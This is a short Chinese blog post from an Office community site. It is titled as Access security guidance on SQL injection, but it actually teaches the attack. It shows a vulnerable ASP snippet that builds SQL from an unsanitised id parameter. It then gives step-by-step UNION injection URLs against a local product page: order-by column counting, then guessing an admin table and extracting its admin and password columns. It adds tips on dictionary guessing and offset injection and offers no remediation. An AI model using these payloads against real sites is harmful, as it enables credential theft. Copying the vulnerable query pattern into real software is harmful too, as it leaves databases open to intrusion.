office交流网--QQ交流群号

Access培训群:792054000         Excel免费交流群群:686050929          Outlook交流群:221378704    

Word交流群:218156588             PPT交流群:324131555

Access安全防范-SQL 注入

2017-09-06 08:00:00
zstmtony
原创
3924



SQL注入之access

access三大攻击手法

1.access注入攻击片段-联合查询法

2.access注入攻击片段-逐字猜解法

3.工具类的使用注入

Sql注入产生条件

1.必须有参数传递

2.参数值带入数据库查询并执行

 

Access注入是暴力猜解

Access数据结构(access只有一个数据库)

Access数据库

表名

列名

数据

  

该页面asp的sql语句

<%
id=request("id")
sql="select * from product where id="&id
set rs=conn.execute(sql)
%>

1.access注入攻击片段-联合查询法(union)

判断注入

猜解表名

猜解列名

猜解数据

Order by 22 22 代表查询的列名的数目有22个

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误

 

猜解表名 确定存在admin表名

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

 

猜解列名 猜解数据

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

 

表名和列名猜解成功率不是百分百,猜解不到解决办法?

1.字典文件收集(社工)

2.Access偏移注入

分享